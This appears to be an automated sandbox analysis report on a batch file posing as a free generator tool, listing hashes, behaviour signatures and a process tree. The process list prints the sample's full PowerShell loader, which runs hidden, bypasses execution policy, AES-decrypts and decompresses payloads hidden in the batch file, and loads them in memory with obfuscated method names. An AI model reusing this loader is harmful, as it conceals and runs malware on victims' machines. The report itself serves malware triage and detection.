Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
28-04-2024 00:08
Static task
static1
Behavioral task
behavioral1
Sample
Freerubexgenpython.bat
Resource
win7-20240419-en
windows7-x64
4 signatures
300 seconds
Behavioral task
behavioral2
Sample
Freerubexgenpython.bat
Resource
win10v2004-20240419-en
windows10-2004-x64
16 signatures
300 seconds
General
-
Target
Freerubexgenpython.bat
-
Size
268KB
-
MD5
08e71b8265c7b98e17894abe76a5d2d5
-
SHA1
e5ab42da766a21f3fbd268e18949d8faac06d44b
-
SHA256
5187903da5fbbdb1cde09db8f9716f9b4196f36ef9788e77f4c51bc2087b5762
-
SHA512
d7e174c2d088da25b15a5bf11879586137bfe37bda060f96cb303cf4fc031b03edebacc33008379a2839fcaca2d5882120fb40d839f8e903fe8a61674bffe851
-
SSDEEP
6144:1ZM4WQySKAs2GF6zmiSbv/ZIsDUU1XkUp/q9PKrjh2uAJ:Q43ySXYGwUHUF8SR2j
Score
1/10
Malware Config
Signatures
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2820 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2820 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exenet.exedescription pid process target process PID 2944 wrote to memory of 3024 2944 cmd.exe net.exe PID 2944 wrote to memory of 3024 2944 cmd.exe net.exe PID 2944 wrote to memory of 3024 2944 cmd.exe net.exe PID 3024 wrote to memory of 2412 3024 net.exe net1.exe PID 3024 wrote to memory of 2412 3024 net.exe net1.exe PID 3024 wrote to memory of 2412 3024 net.exe net1.exe PID 2944 wrote to memory of 2820 2944 cmd.exe powershell.exe PID 2944 wrote to memory of 2820 2944 cmd.exe powershell.exe PID 2944 wrote to memory of 2820 2944 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Freerubexgenpython.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:2412
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OMfU2O/sz3OM/dxd2x/oRWHtwta2mB/0Opg+Z1lWEW0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EN242PanCEqLXh62K3FbUg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CiBhI=New-Object System.IO.MemoryStream(,$param_var); $eaDHU=New-Object System.IO.MemoryStream; $BbFJq=New-Object System.IO.Compression.GZipStream($CiBhI, [IO.Compression.CompressionMode]::Decompress); $BbFJq.CopyTo($eaDHU); $BbFJq.Dispose(); $CiBhI.Dispose(); $eaDHU.Dispose(); $eaDHU.ToArray();}function execute_function($param_var,$param2_var){ $FUVAc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $HzYVf=$FUVAc.EntryPoint; $HzYVf.Invoke($null, $param2_var);}$CRArJ = 'C:\Users\Admin\AppData\Local\Temp\Freerubexgenpython.bat';$host.UI.RawUI.WindowTitle = $CRArJ;$WIcio=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CRArJ).Split([Environment]::NewLine);foreach ($nSrGG in $WIcio) { if ($nSrGG.StartsWith(':: ')) { $lwNuy=$nSrGG.Substring(3); break; }}$payloads_var=[string[]]$lwNuy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820